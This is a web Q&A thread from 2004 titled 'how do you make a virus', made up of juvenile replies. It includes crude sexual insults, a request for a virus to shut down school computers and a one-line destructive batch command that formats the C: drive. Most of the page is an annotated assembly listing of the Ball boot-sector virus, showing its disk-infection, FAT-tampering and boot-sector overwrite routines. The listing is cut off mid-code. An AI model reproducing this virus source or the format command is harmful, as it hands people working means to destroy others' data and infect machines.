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...make a virus?

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Question by jim
Submitted on 4/23/2004
Related FAQ: [alt.comp.virus] FAQ Part 1/4
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how do you make a virus?

Answer by Caleb6164
Submitted on 4/28/2004
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I want to know how to make a computer virus!


Answer by George
Submitted on 5/25/2004
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Answer by ZELZAL
Submitted on 5/31/2004
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Answer by Ripper
Submitted on 6/19/2004
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i need 2 no how to make a virus some one please help me


Answer by computerhacker
Submitted on 6/21/2004
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First u lil wanna b'sneed to learn how to program in certain scripts such as php c++ perl java. get a decent computer, preferably a server and a criminal record lol.


Answer by boby
Submitted on 8/9/2004
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porno pop up


Answer by kcahehtdlrow
Submitted on 8/14/2004
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i created a new type or virus i call mommyschild.exe


Answer by Founder.s.
Submitted on 8/17/2004
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Look its simple you D/l a virus software known as Frag.send.Virus.exe and its a prog. that will let u create a virus with very simple comands and instructions. i will give u a link if you still want to make a virus.
and i dont have a criminal record.


Answer by thechemist
Submitted on 8/21/2004
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how can i make a worldwide powerful virus and how can i prevent it from hurting my pc lol muhahaha


Answer by shane
Submitted on 8/25/2004
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you stick a cock up your ass


Answer by BUllseye
Submitted on 8/25/2004
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Guess what all. You all a bunch of retards. You wanna no how to hack, and make virus's email me at jagex_RUnescape_844@hotmail.com If you lucky I might send you a Guide (For people who are stupid) And an advanced guide that I wrote myself


Answer by iwant a virus
Submitted on 8/28/2004
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hey me to how to make a virus


Answer by ankur
Submitted on 9/8/2004
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how to make a virus


Answer by jaba
Submitted on 9/9/2004
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i wanr a virus to shut down all school computers for  a long time


Answer by mulletman
Submitted on 9/12/2004
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a good site for mac or apple viruses is http://freaky.staticusers.net


Answer by 00-0
Submitted on 9/13/2004
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this is a virus but is encripted so u have to crack the code to use it.
        `    aN  C3ELkpqrs


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Answer by mat
Submitted on 9/28/2004
Rating: Not yet rated Rate this answer: Vote
how ya make a virus get an ip adress


Answer by VirusMaker
Submitted on 11/10/2004
Rating: Not yet rated Rate this answer: Vote
Just type this in the MS-DOS window:
@ECHO off
format C:\ -y
format system -y


Answer by h
Submitted on 12/10/2004
Rating: Not yet rated Rate this answer: Vote
get emule with broadband and then download c++ of the internet


Answer by boris
Submitted on 12/15/2004
Rating: Not yet rated Rate this answer: Vote
get some womans panities on and enjoy boris dumslawski


Answer by LOL
Submitted on 12/21/2004
Rating: Not yet rated Rate this answer: Vote
i do virus in nopepad :P


Answer by LOL
Submitted on 12/23/2004
Rating: Not yet rated Rate this answer: Vote

TITLE   *** ASMGEN - Version 2.51 ***
SUBTTL   BALL.VIR  3-15-89   [3-22-89]

DB   0C3H
.RADIX   16
;INITIAL VALUES :   CS:IP   0000:0100
;         SS:SP   0000:FFFF
                  ;L0000S     L7C00 DI  L7C1C CI  L7C93 CJ   L7D31 DB  L7D76 DB  L7DF7 CB  L7DF8 CB
                  ;     L7DFB CB  L7E86 DI  L7EA9 DI   L7EB2 CB  L7EBF DI  L7F4E DB  L7F62 DB
                  ;     L7FCB CI  L7FCD CI  L7FD3 CB
   ASSUME   DS:S0000,SS:S0000,CS:S0000,ES:S0000
   ORG   $+7C00H
L0000   EQU   $-7C00
                  ;L0001     L7C0E CI  L7CDA DB  L7D12 DB   L7D33 DI  L7D46 DB  L7DE0 DI  L7DF3 CI
                  ;     L7E3A DI  L7E60 DI  L7EFC DB   L7F37 DB  L7F43 DI  L7FAD DB  L7FB6 DI
L0001   EQU   $-7BFF
                  ;L0002     L7C0D CB  L7C10 CB  L7C16 CI   L7C1A CI  L7C2A DI  L7CE1 DB  L7D5A DB
                  ;     L7D93 DB  L7E08 DB  L7E75 DI   L7EB3 DB  L7EBA DB  L7F2C DB  L7FA0 DB
                  ;     L7FBF DB
L0002   EQU   $-7BFE
                  ;L0003     L7E12 DI  L7F1C DB  L7F27 DB   L7F82 DB
L0003   EQU   $-7BFDh
                  ;L0004     L7D43 DI  L7D46 DB  L7D4C DB   L7D4C DB  L7DDB DB  L7E15 DB  L7E31 DB
                  ;     L7E38 DB  L7E54 DB  L7E5E DB   L7F05 DB
L0004   EQU   $-7BFC
                  ;L0005     L7F8B DB
L0005   EQU   $-7BFBh
                  ;L0006     L7C30 DB  L7CB5 DB
L0006   EQU   $-7BFA
                  ;L0007     L7EFE DB  L7F80 DB
L0007   EQU   $-7BF9
                  ;L0008     L7FA4 DB
L0008   EQU   $-7BF8
                  ;L0009     L7C18 CI  L7F46 DB
L0009   EQU   $-7BF7
                  ;L000F     L7E42 DB  L7E5B DB  L7EE6 DB
L000F   EQU   $-7BF1
                  ;L0010     L7D52 DI
L0010   EQU   $-7BF0
                  ;L0013     L7DFB CB
L0013   EQU   $-7BEDh
                  ;L0018     L7F58 DB
L0018   EQU   $-7BE8
                  ;L001C     L7D69 DI
L001C   EQU   $-7BE4
                  ;L0020     L7C59 DI  L7DA8 DI  L7E9A DI   L7EC4 DR  L7ECB DW  L7FC9 CI
L0020   EQU   $-7BE0
                  ;L0022     L7EC7 DR  L7ED1 DW
L0022   EQU   $-7BDE
                  ;L0024     L7D0D DI
L0024   EQU   $-7BDC
                  ;L0040     L7EA4 DI
L0040   EQU   $-7BC0
                  ;L004C     L7C75 DR  L7C7C DW
L004C   EQU   $-7BB4
                  ;L004E     L7C78 DR  L7C82 DW
L004E   EQU   $-7BB2
                  ;L0050     L7FD6 CB
L0050   EQU   $-7BB0
                  ;L0055     L7DFE CB
L0055   EQU   $-7BABh
                  ;L0057     L7DFB CB
L0057   EQU   $-7BA9
                  ;L0070     L7C11 CI
L0070   EQU   $-7B90
                  ;L0073     L7DF5 CI
L0073   EQU   $-7B8Dh
                  ;L007F     L7CF4 DB
L007F   EQU   $-7B81
                  ;L0080     L7C4E DB  L7D39 DB
L0080   EQU   $-7B80
                  ;L0083     L7FB4 DB
L0083   EQU   $-7B7Dh
                  ;L00AA     L7DFE CB
L00AA   EQU   $-7B56
                  ;L00D3     L7DF9 CI
L00D3   EQU   $-7B2Dh
                  ;L00EA     L7D29 DB  L7FC8 DB
L00EA   EQU   $-7B16
                  ;L00F0     L7CF9 DB
L00F0   EQU   $-7B10
                  ;L00FB     L7DD1 DB
L00FB   EQU   $-7B05
                  ;L00FD     L7C15 CB
L00FD   EQU   $-7B03
                  ;L00FE     L7D1E DB  L7DEC DB
L00FE   EQU   $-7B02
                  ;L00FF     L7F53 DB  L7F5D DB  L7F67 DB   L7F72 DB  L7F86 DB  L7F8F DB
L00FF   EQU   $-7B01
                  ;L0100     L7C3E DI
L0100   EQU   $-7B00
                  ;L0101     L7F10 DI  L7F16 DI  L7FCD CI
L0101   EQU   $-7AFF
                  ;L01FF     L7DAF DI  L7E27 DI
L01FF   EQU   $-7A01
                  ;L0200     L7C0B CI  L7D8B DI  L7DB2 DI
L0200   EQU   $-7A00
                  ;L0201     L7C9D DI  L7D2E DI  L7D5D DI
L0201   EQU   $-79FF
                  ;L02D0     L7C13 CI
L02D0   EQU   $-7930
                  ;L0301     L7C98 DI
L0301   EQU   $-78FF
                  ;L0413     L7C27 DR  L7C2D DW
L0413   EQU   $-77EDh
                  ;L07C0     L7C34 DI
L07C0   EQU   $-7440
                  ;L0907     L7FB9 DI
L0907   EQU   $-72F9
                  ;L0FF0     L7DD6 DI
L0FF0   EQU   $-6C10
                  ;L1357     L7D6E DI
L1357   EQU   $-68A9
                  ;L49E8     L7EB0 CI
L49E8   EQU   $-3218
                  ;L77C0     L7D2C CI
L77C0   EQU   $-440
                  ;L7C00     L7C22 DI  L7C39 DI  L7C93 CJ
;   Boot entry of Virus
BOOT:   JMP   SHORT   INIT      ;Init virus   ;7C00 EB 1C
                  ;L7C02     L7D66 DI
L7C02:   NOP               ;7C02 90
;   OEM
   DB   'DOS  3.1'         ;7C03 44 4F 53 20 20 33 2E 31
;   Size of Disk sector in bytes
   DW   L0200            ;7C0B 00 02
                  ;L7C0D     L7DC4 DR  L7E78 DR
;   Size of Cluster in sectors
   DB   2            ;7C0D 02
                  ;L7C0E     L7DE3 DR
   DW   L0001            ;7C0E 01 00
   DB   2            ;7C10 02
;   Size of root directory in Dir entryes
   DW   L0070            ;7C11 70 00
                  ;L7C13     L7DBD DR
   DW   L02D0            ;7C13 D0 02
   DB   0FDh            ;7C15 FD
;   Size of FAT in sectors
   DW   L0002            ;7C16 02 00
                  ;L7C18     L7CA7 DR
   DW   L0009            ;7C18 09 00
                  ;L7C1A     L7CB1 DR
HEADS   DW   L0002            ;7C1A 02 00
                  ;L7C1C     L7CA1 DR
   DW   L0000            ;7C1C 00 00
                  ;L7C1E     L7C00 CJ
;   Init virus
INIT:   XOR   AX,AX            ;7C1E 33 C0
   MOV   SS,AX            ;7C20 8E D0
   MOV   SP,OFFSET BOOT      ;Boot entry of Virus   ;7C22 BC 00 7C
   MOV   DS,AX            ;7C25 8E D8
   MOV   AX,DS:MEM_SIZE      ;Memory size in kilobytes   
                  ;7C27 A1 13 04
   SUB   AX,2            ;7C2A 2D 02 00
   MOV   DS:MEM_SIZE,AX      ;Memory size in kilobytes   
                  ;7C2D A3 13 04
   MOV   CL,6            ;7C30 B1 06
   SHL   AX,CL            ;7C32 D3 E0
   SUB   AX,7C0            ;7C34 2D C0 07
   MOV   ES,AX            ;7C37 8E C0
   MOV   SI,OFFSET BOOT      ;Boot entry of Virus   ;7C39 BE 00 7C
   MOV   DI,SI            ;7C3C 8B FE
   MOV   CX,100            ;7C3E B9 00 01
;   Moving virus to end of memory
   REPZ   MOVSW            ;7C41 F3 A5
;   And Jump There
   MOV   CS,AX            ;7C43 8E C8
;   CS and DS to new virus location
   PUSH   CS            ;7C45 0E
   POP   DS            ;7C46 1F
   CALL   SELF         ;Push ip in stack   ;7C47 E8 00 00
                  ;L7C4A     L7C47 CC
;   Push ip in stack
SELF:   XOR   AH,AH            ;7C4A 32 E4
   INT   13            ;7C4C CD 13
   AND   BYTE PTR CUR_DRIVE,80   ;Last Drive Accessed   ;7C4E 80 26 F8 7D 80
   MOV   BX,VIRUSLSN      ;LSN of Virus extention   ;7C53 8B 1E F9 7D
   PUSH   CS            ;7C57 0E
   POP   AX            ;7C58 58
   SUB   AX,20   ;' '         ;7C59 2D 20 00
;   Reading second part of virus
   MOV   ES,AX            ;7C5C 8E C0
   CALL   READ_SC         ;Reads sector BX = LSN   ;7C5E E8 3C 00
   MOV   BX,VIRUSLSN      ;LSN of Virus extention   ;7C61 8B 1E F9 7D
   INC   BX            ;7C65 43
   MOV   AX,OFFSET LFFC0         ;7C66 B8 C0 FF
;   Readind original boot sector
   MOV   ES,AX            ;7C69 8E C0
   CALL   READ_SC         ;Reads sector BX = LSN   ;7C6B E8 2F 00
   XOR   AX,AX            ;7C6E 33 C0
   MOV   FLAGS,AL      ;Sum semapfor type flags   
                  ;7C70 A2 F7 7D
   MOV   DS,AX            ;7C73 8E D8
   MOV   AX,DS:INT13_OFF         ;7C75 A1 4C 00
   MOV   BX,DS:INT13_SEG         ;7C78 8B 1E 4E 00
                  ;7C7C C7 06 4C 00 D0 7C
   MOV   DS:INT13_SEG,CS         ;7C82 8C 0E 4E 00
   PUSH   CS            ;7C86 0E
   POP   DS            ;7C87 1F
   MOV   OLD_INT13_OFF,AX      ;7C88 A3 2A 7D
   MOV   OLD_INT13_SEG,BX      ;7C8B 89 1E 2C 7D
   MOV   DL,CUR_DRIVE      ;Last Drive Accessed   ;7C8F 8A 16 F8 7D
   JMP   FAR PTR   BOOTDS:      ;Boot entry of Virus   ;7C93 EA 00 7C 00 00
                  ;L7C98     L7E70 CC  L7E8F CC  L7E9F CC   L7EAC CC
;   Writes sector BX = LSN
   MOV   AX,301            ;7C98 B8 01 03
   JMP   SHORT   OPERATE         ;7C9B EB 03
                  ;L7C9D     L7C5E CC  L7C6B CC  L7E0D CC   L7E89 CC
;   Reads sector BX = LSN
   MOV   AX,201            ;7C9D B8 01 02
                  ;L7CA0     L7C9B CJ
   XCHG   BX,AX            ;7CA0 93
   ADD   AX,HIDDEN_SCS         ;7CA1 03 06 1C 7C
   XOR   DX,DX            ;7CA5 33 D2
   DIV   WORD PTR SEC_TRACK      ;7CA7 F7 36 18 7C
   INC   DL            ;7CAB FE C2
   MOV   CH,DL            ;7CAD 8A EA
   XOR   DX,DX            ;7CAF 33 D2
   DIV   WORD PTR HEADS         ;7CB1 F7 36 1A 7C
   MOV   CL,6            ;7CB5 B1 06
   SHL   AH,CL            ;7CB7 D2 E4
   OR   AH,CH            ;7CB9 0A E5
   MOV   CX,AX            ;7CBB 8B C8
   XCHG   CH,CL            ;7CBD 86 E9
   MOV   DH,DL            ;7CBF 8A F2
   MOV   AX,BX            ;7CC1 8B C3
                  ;L7CC3     L7D36 CC  L7D60 CC
;   Access disk service and returns one level more if Error
   MOV   DL,CUR_DRIVE      ;Last Drive Accessed   ;7CC3 8A 16 F8 7D
   MOV   BX,OFFSET R_W_BUFF   ;Buffer for read/write sector   
                  ;7CC7 BB 00 80
   INT   13            ;7CCA CD 13
   JNB   EXIT_D_CALL         ;7CCC 73 01
   POP   AX            ;7CCE 58
                  ;L7CCF     L7CCC CJ
   RET_NEAR            ;7CCF C3
                  ;L7CD0     L7C7C DI  L7D2A CI
   PUSH   DS            ;7CD0 1E
   PUSH   ES            ;7CD1 06
   PUSH   AX            ;7CD2 50
   PUSH   BX            ;7CD3 53
   PUSH   CX            ;7CD4 51
   PUSH   DX            ;7CD5 52
   PUSH   CS            ;7CD6 0E
   POP   DS            ;7CD7 1F
   PUSH   CS            ;7CD8 0E
   POP   ES            ;7CD9 07
   TEST   BYTE PTR FLAGS,1   ;Sum semapfor type flags   
                  ;7CDA F6 06 F7 7D 01
   JNZ   EXIT_INT13         ;7CDF 75 42
   CMP   AH,2            ;7CE1 80 FC 02
   JNZ   EXIT_INT13         ;7CE4 75 3D
   CMP   CUR_DRIVE,DL      ;Last Drive Accessed   ;7CE6 38 16 F8 7D
   MOV   CUR_DRIVE,DL      ;Last Drive Accessed   ;7CEA 88 16 F8 7D
   JNZ   L7D12         ;Don't Run if less then 24 Ticks   
                  ;7CEE 75 22
   XOR   AH,AH            ;7CF0 32 E4
   INT   1A            ;7CF2 CD 1A
;   CX:DX <- BIOS Time
   TEST   DH,7F            ;7CF4 F6 C6 7F
   JNZ   DONTBALL      ;Do not display ball   ;7CF7 75 0A
   TEST   DL,0F0            ;7CF9 F6 C2 F0
   JNZ   DONTBALL      ;Do not display ball   ;7CFC 75 05
   PUSH   DX            ;7CFE 52
   CALL   BALL_ACT      ;Activate Ball on Screen   
                  ;7CFF E8 B1 01
   POP   DX            ;7D02 5A
                  ;L7D03     L7CF7 CJ  L7CFC CJ
;   Do not display ball
   MOV   CX,DX            ;7D03 8B CA
   SUB   DX,TIME         ;Last time drive is accessed   
                  ;7D05 2B 16 B0 7E
   MOV   TIME,CX         ;Last time drive is accessed   
                  ;7D09 89 0E B0 7E
   SUB   DX,24   ;'$'         ;7D0D 83 EA 24
   JB   EXIT_INT13         ;7D10 72 11
                  ;L7D12     L7CEE CJ
;   Don't Run if less then 24 Ticks
L7D12:   OR   BYTE PTR FLAGS,1   ;Sum semapfor type flags   
                  ;7D12 80 0E F7 7D 01
   PUSH   SI            ;7D17 56
   PUSH   DI            ;7D18 57
   CALL   ATTACH         ;Attachs Last accessed device   
                  ;7D19 E8 12 00
   POP   DI            ;7D1C 5F
   POP   SI            ;7D1D 5E
   AND   BYTE PTR FLAGS,0FE   ;Sum semapfor type flags   
                  ;7D1E 80 26 F7 7D FE
                  ;L7D23     L7CDF CJ  L7CE4 CJ  L7D10 CJ
   POP   DX            ;7D23 5A
   POP   CX            ;7D24 59
   POP   BX            ;7D25 5B
   POP   AX            ;7D26 58
   POP   ES            ;7D27 07
   POP   DS            ;7D28 1F
;   Opcode of far jmp
   DB   0EA            ;7D29 EA
                  ;L7D2A     L7C88 DW
   DW   NEW_INT13         ;7D2A D0 7C
                  ;L7D2C     L7C8B DW
   DW   L77C0            ;7D2C C0 77
                  ;L7D2E     L7D19 CC
;   Attachs Last accessed device
ATTACH:   MOV   AX,201            ;7D2E B8 01 02
   MOV   DH,0            ;7D31 B6 00
   MOV   CX,1            ;7D33 B9 01 00
   CALL   DISK_CALL      ;Access disk service and returns one level more if Error   
                  ;7D36 E8 8A FF
   TEST   BYTE PTR CUR_DRIVE,80   ;Last Drive Accessed   ;7D39 F6 06 F8 7D 80
   JZ   BOOT_READ      ;Boot sector now in memory   
                  ;7D3E 74 23
   MOV   SI,OFFSET PART_TABLE   ;Partition Table   ;7D40 BE BE 81
   MOV   CX,4            ;7D43 B9 04 00
                  ;L7D46     L7D55 CJ
;   Search in Partition table
   CMP   BYTE PTR [SI+4],1      ;7D46 80 7C 04 01
   JZ   FOUND_IN_PART      ;Boot sector found in partition table   
                  ;7D4A 74 0C
   CMP   BYTE PTR [SI+4],4      ;7D4C 80 7C 04 04
   JZ   FOUND_IN_PART      ;Boot sector found in partition table   
                  ;7D50 74 06
   ADD   SI,10            ;7D52 83 C6 10
   LOOP   PART_SEARCH      ;Search in Partition table   
                  ;7D55 E2 EF
   RET_NEAR            ;7D57 C3
                  ;L7D58     L7D4A CJ  L7D50 CJ
;   Boot sector found in partition table
   MOV   DX,[SI]            ;7D58 8B 14
   MOV   CX,[SI+2]         ;7D5A 8B 4C 02
   MOV   AX,201            ;7D5D B8 01 02
   CALL   DISK_CALL      ;Access disk service and returns one level more if Error   
                  ;7D60 E8 60 FF
                  ;L7D63     L7D3E CJ
;   Boot sector now in memory
   MOV   SI,OFFSET L8002         ;7D63 BE 02 80
   MOV   DI,OFFSET L7C02         ;7D66 BF 02 7C
   MOV   CX,1C            ;7D69 B9 1C 00
   REPZ   MOVSB            ;7D6C F3 A4
   CMP   WORD PTR L81FC,1357   ;'W'   ;7D6E 81 3E FC 81 57 13
   JNZ   NOT_ATTCD      ;Disk is not yet Attached   
                  ;7D74 75 15
   CMP   BYTE PTR L81FB,0      ;7D76 80 3E FB 81 00
   JNB   EXIT_RDY      ;Exit allready attached   ;7D7B 73 0D
   MOV   AX,D_LSN_D      ;LSN of first data sector of disk   
                  ;7D7D A1 F5 81
   MOV   D_LSN,AX      ;LSN of first data sector   
                  ;7D80 A3 F5 7D
   MOV   SI,LSN_DSK      ;LSN of virus of Disk   ;7D83 8B 36 F9 81
   JMP   WRITE_CODE      ;Writes it self in two sectors of disk   
                  ;7D87 E9 08 01
                  ;L7D8A     L7D7B CJ  L7D91 CJ  L7D98 CJ
;   Exit allready attached
   RET_NEAR            ;7D8A C3
                  ;L7D8B     L7D74 CJ
;   Disk is not yet Attached
   CMP   WORD PTR SEC_SIZE_D,200   ;Size of Disk sector in bytes of Disk   
                  ;7D8B 81 3E 0B 80 00 02
   JNZ   EXIT_RDY      ;Exit allready attached   ;7D91 75 F7
   CMP   BYTE PTR CLSTSIZE_D,2   ;Size of Cluster in sectors of Disk   
                  ;7D93 80 3E 0D 80 02
   JB   EXIT_RDY      ;Exit allready attached   ;7D98 72 F0
   MOV   CX,RES_SECT_D      ;of Disk   ;7D9A 8B 0E 0E 80
   MOV   AL,FAT_NUMBER_D      ;of Disk   ;7D9E A0 10 80
   CBW               ;7DA1 98
   MUL   WORD PTR FAT_SIZE_D   ;Size of FAT in sectors of Disk   
                  ;7DA2 F7 26 16 80
   ADD   CX,AX            ;7DA6 03 C8
   MOV   AX,20   ;' '         ;7DA8 B8 20 00
   MUL   WORD PTR ROOT_SIZE_D   ;Size of root directory in Dir entryes of Disk   
                  ;7DAB F7 26 11 80
   ADD   AX,1FF            ;7DAF 05 FF 01
   MOV   BX,200            ;7DB2 BB 00 02
   DIV   BX            ;7DB5 F7 F3
   ADD   CX,AX            ;7DB7 03 C8
   MOV   D_LSN,CX      ;LSN of first data sector   
                  ;7DB9 89 0E F5 7D
   MOV   AX,TOTAL_SECTORS      ;7DBD A1 13 7C
   SUB   AX,D_LSN      ;LSN of first data sector   
                  ;7DC0 2B 06 F5 7D
   MOV   BL,CLSTSIZE      ;Size of Cluster in sectors   
                  ;7DC4 8A 1E 0D 7C
   XOR   DX,DX            ;7DC8 33 D2
   XOR   BH,BH            ;7DCA 32 FF
   DIV   BX            ;7DCC F7 F3
   INC   AX            ;7DCE 40
   MOV   DI,AX            ;7DCF 8B F8
   AND   BYTE PTR FLAGS,0FBh   ;Sum semapfor type flags   
                  ;7DD1 80 26 F7 7D FB
   CMP   AX,0FF0            ;7DD6 3D F0 0F
   JBE   FAT_12_0      ;12 bit FAT   ;7DD9 76 05
   OR   BYTE PTR FLAGS,4   ;Sum semapfor type flags   
                  ;7DDB 80 0E F7 7D 04
                  ;L7DE0     L7DD9 CJ
;   12 bit FAT
   MOV   SI,1            ;7DE0 BE 01 00
   MOV   BX,RES_SECT         ;7DE3 8B 1E 0E 7C
   DEC   BX            ;7DE7 4B
   MOV   LSN_TEMP,BX      ;Sector to operate temp variable   
                  ;7DE8 89 1E F3 7D
   MOV   BYTE PTR FAT_ADJUST,0FE   ;Adjust pointer in FAT   ;7DEC C6 06 B2 7E FE
   JMP   SHORT   NEXT_F_S   ;Next Sector of FAT. It is in Second Virus Sector.   
                  ;7DF1 EB 0D
                  ;L7DF3     L7DE8 DW  L7E00 DM  L7E04 DR   L7E6C DR
;   Sector to operate temp variable
   DW   L0001            ;7DF3 01 00
                  ;L7DF5     L7D80 DW  L7DB9 DW  L7DC0 DR   L7E80 DR
;   LSN of first data sector
D_LSN   DW   L0073            ;7DF5 73 00
                  ;L7DF7     L7C70 DW  L7CDA DT  L7D12 DM   L7D1E DM  L7DD1 DM  L7DDB DM  L7E15 DT
                  ;     L7E31 DT  L7E54 DT  L7EB3 DT   L7EBA DM
;   Sum semapfor type flags
FLAGS   DB   0            ;7DF7 00
                  ;L7DF8     L7C4E DM  L7C8F DR  L7CC3 DR   L7CE6 DT  L7CEA DW  L7D39 DT
;   Last Drive Accessed
   DB   0            ;7DF8 00
                  ;L7DF9     L7C53 DR  L7C61 DR  L7E94 DW
;   LSN of Virus extention
   DW   L00D3            ;7DF9 D3 00
;   Marker 'Disk Attached'
   DB   0,57,13            ;7DFB 00 57 13
;   Boot sector marker
   DB   55,0AA            ;7DFE 55 AA
                  ;L7E00     L7DF1 CJ  L7E2B CJ
;   Next Sector of FAT. It is in Second Virus Sector.
   INC   WORD PTR LSN_TEMP   ;Sector to operate temp variable   
                  ;7E00 FF 06 F3 7D
   MOV   BX,LSN_TEMP      ;Sector to operate temp variable   
                  ;7E04 8B 1E F3 7D
   ADD   BYTE PTR FAT_ADJUST,2   ;Adjust pointer in FAT   ;7E08 80 06 B2 7E 02
   CALL   READ_SC         ;Reads sector BX = LSN   ;7E0D E8 8D FE
   JMP   SHORT   NEXT_ENTRY   ;Next entry in FAT   ;7E10 EB 39
                  ;L7E12     L7E4E CJ
;   Process single FAT entry
   MOV   AX,3            ;7E12 B8 03 00
   TEST   BYTE PTR FLAGS,4   ;Sum semapfor type flags   
                  ;7E15 F6 06 F7 7D 04
   JZ   FAT_12_1      ;AX = Bytes per two clusters in FAT   
                  ;7E1A 74 01
   INC   AX            ;7E1C 40
                  ;L7E1D     L7E1A CJ
;   AX = Bytes per two clusters in FAT
   MUL   SI            ;7E1D F7 E6
   SHR   AX,1            ;7E1F D1 E8
   SUB   AH,FAT_ADJUST      ;Adjust pointer in FAT   ;7E21 2A 26 B2 7E
   MOV   BX,AX            ;7E25 8B D8
   CMP   BX,1FF            ;7E27 81 FB FF 01
   JNB   NEXT_F_S      ;Next Sector of FAT. It is in Second Virus Sector.   
                  ;7E2B 73 D3
   MOV   DX,[BX+R_W_BUFF]   ;Buffer for read/write sector   
                  ;7E2D 8B 97 00 80
   TEST   BYTE PTR FLAGS,4   ;Sum semapfor type flags   
                  ;7E31 F6 06 F7 7D 04
   JNZ   FAT_16_1         ;7E36 75 0D
   MOV   CL,4            ;7E38 B1 04
   TEST   SI,1            ;7E3A F7 C6 01 00
   JZ   RIGHT_ENTRY      ;Dont move FAT entry   ;7E3E 74 02
   SHR   DX,CL            ;7E40 D3 EA
                  ;L7E42     L7E3E CJ
;   Dont move FAT entry
   AND   DH,0F            ;7E42 80 E6 0F
                  ;L7E45     L7E36 CJ
   TEST   DX,0FFFF         ;7E45 F7 C2 FF FF
   JZ   FOUND_CL      ;Free cluster found   ;7E49 74 06
                  ;L7E4B     L7E10 CJ
;   Next entry in FAT
   INC   SI            ;7E4B 46
   CMP   SI,DI            ;7E4C 3B F7
   JBE   NEXT_ENTRY_LOOP      ;Process single FAT entry   
                  ;7E4E 76 C2
   RET_NEAR            ;7E50 C3
                  ;L7E51     L7E49 CJ
;   Free cluster found
   MOV   DX,OFFSET LFFF7         ;7E51 BA F7 FF
   TEST   BYTE PTR FLAGS,4   ;Sum semapfor type flags   
                  ;7E54 F6 06 F7 7D 04
   JNZ   WRITE_BAD      ;Write marker for bad sector   
                  ;7E59 75 0D
   AND   DH,0F            ;7E5B 80 E6 0F
   MOV   CL,4            ;7E5E B1 04
   TEST   SI,1            ;7E60 F7 C6 01 00
   JZ   WRITE_BAD      ;Write marker for bad sector   
                  ;7E64 74 02
   SHL   DX,CL            ;7E66 D3 E2
                  ;L7E68     L7E59 CJ  L7E64 CJ
;   Write marker for bad sector
   OR   [BX+R_W_BUFF],DX   ;Buffer for read/write sector   
                  ;7E68 09 97 00 80
   MOV   BX,LSN_TEMP      ;Sector to operate temp variable   
                  ;7E6C 8B 1E F3 7D
   CALL   WRITESC         ;Writes sector BX = LSN   ;7E70 E8 25 FE
   MOV   AX,SI            ;7E73 8B C6
   SUB   AX,2            ;7E75 2D 02 00
   MOV   BL,CLSTSIZE      ;Size of Cluster in sectors   
                  ;7E78 8A 1E 0D 7C
   XOR   BH,BH            ;7E7C 32 FF
   MUL   BX            ;7E7E F7 E3
   ADD   AX,D_LSN      ;LSN of first data sector   
                  ;7E80 03 06 F5 7D
   MOV   SI,AX            ;7E84 8B F0
   MOV   BX,0            ;7E86 BB 00 00
   CALL   READ_SC         ;Reads sector BX = LSN   ;7E89 E8 11 FE
   MOV   BX,SI            ;7E8C 8B DE
   INC   BX            ;7E8E 43
   CALL   WRITESC         ;Writes sector BX = LSN   ;7E8F E8 06 FE
                  ;L7E92     L7D87 CJ
;   Writes it self in two sectors of disk
   MOV   BX,SI            ;7E92 8B DE
   MOV   VIRUSLSN,SI      ;LSN of Virus extention   ;7E94 89 36 F9 7D
   PUSH   CS            ;7E98 0E
   POP   AX            ;7E99 58
   SUB   AX,20   ;' '         ;7E9A 2D 20 00
   MOV   ES,AX            ;7E9D 8E C0
   CALL   WRITESC         ;Writes sector BX = LSN   ;7E9F E8 F6 FD
;   OverWrite Boot sector
   PUSH   CS            ;7EA2 0E
   POP   AX            ;7EA3 58
   SUB   AX,40   ;'@'         ;7EA4 2D 40 00
   MOV   ES,AX            ;7EA7 8E C0
   MOV   BX,0            ;7EA9 BB 00 00
   CALL   WRITESC         ;Writes sector BX = LSN   ;7EAC E8 E9 FD
   RET_NEAR            ;7EAF C3
                  ;L7EB0     L7D05 DR  L7D09 DW
;   Last time drive is accessed
TIME   DW   L49E8            ;7EB0 E8 49
                  ;L7EB2     L7DEC DW  L7E08 DM  L7E21 DR
;   Adjust pointer in FAT
   DB   0            ;7EB2 00
                  ;L7EB3     L7CFF CC
;   Activate Ball on Screen
   TEST   BYTE PTR FLAGS,2   ;Sum semapfor type flags   
                  ;7EB3 F6 06 F7 7D 02
   JNZ   EXIT_BALL_ACT         ;7EB8 75 24
   OR   BYTE PTR FLAGS,2   ;Sum semapfor type flags   
                  ;7EBA 80 0E F7 7D 02
   MOV   AX,0            ;7EBF B8 00 00
   MOV   DS,AX            ;7EC2 8E D8
   MOV   AX,DS:TIMER_OFF         ;7EC4 A1 20 00
   MOV   BX,DS:TIMER_SEG         ;7EC7 8B 1E 22 00
   MOV   WORD PTR DS:TIMER_OFF,OFFSET TIMER   ;Timer Interrupt Handler   
                  ;7ECB C7 06 20 00 DF 7E
   MOV   DS:TIMER_SEG,CS         ;7ED1 8C 0E 22 00
   PUSH   CS            ;7ED5 0E
   POP   DS            ;7ED6 1F
   MOV   OLD_TIMER_OFF,AX      ;7ED7 A3 C9 7F
   MOV   OLD_TIMER_SEG,BX      ;7EDA 89 1E CB 7F
                  ;L7EDE     L7EB8 CJ
   RET_NEAR            ;7EDE C3
                  ;L7EDF     L7ECB DI
;   Timer Interrupt Handler
TIMER:   PUSH   DS            ;7EDF 1E
   PUSH   AX            ;7EE0 50
   PUSH   BX            ;7EE1 53
   PUSH   CX            ;7EE2 51
   PUSH   DX            ;7EE3 52
   PUSH   CS            ;7EE4 0E
   POP   DS            ;7EE5 1F
   MOV   AH,0F            ;7EE6 B4 0F
   INT   10            ;7EE8 CD 10
   MOV   BL,AL            ;7EEA 8A D8
   CMP   BX,L7FD4      ;Sum vars   ;7EEC 3B 1E D4 7F
   JZ   L7F27            ;7EF0 74 35
   MOV   L7FD4,BX      ;Sum vars   ;7EF2 89 1E D4 7F
   DEC   AH            ;7EF6 FE CC
   MOV   L7FD6,AH      ;Sum vars   ;7EF8 88 26 D6 7F
   MOV   AH,1            ;7EFC B4 01
   CMP   BL,7            ;7EFE 80 FB 07
   JNZ   L7F05            ;7F01 75 02
   DEC   AH            ;7F03 FE CC
                  ;L7F05     L7F01 CJ
L7F05:   CMP   BL,4            ;7F05 80 FB 04
   JNB   L7F0C            ;7F08 73 02
   DEC   AH            ;7F0A FE CC
                  ;L7F0C     L7F08 CJ
L7F0C:   MOV   L7FD3,AH      ;Sum vars   ;7F0C 88 26 D3 7F
   MOV   WORD PTR L7FCF,101      ;7F10 C7 06 CF 7F 01 01
   MOV   WORD PTR L7FD1,101      ;7F16 C7 06 D1 7F 01 01
   MOV   AH,3            ;7F1C B4 03
   INT   10            ;7F1E CD 10
   PUSH   DX            ;7F20 52
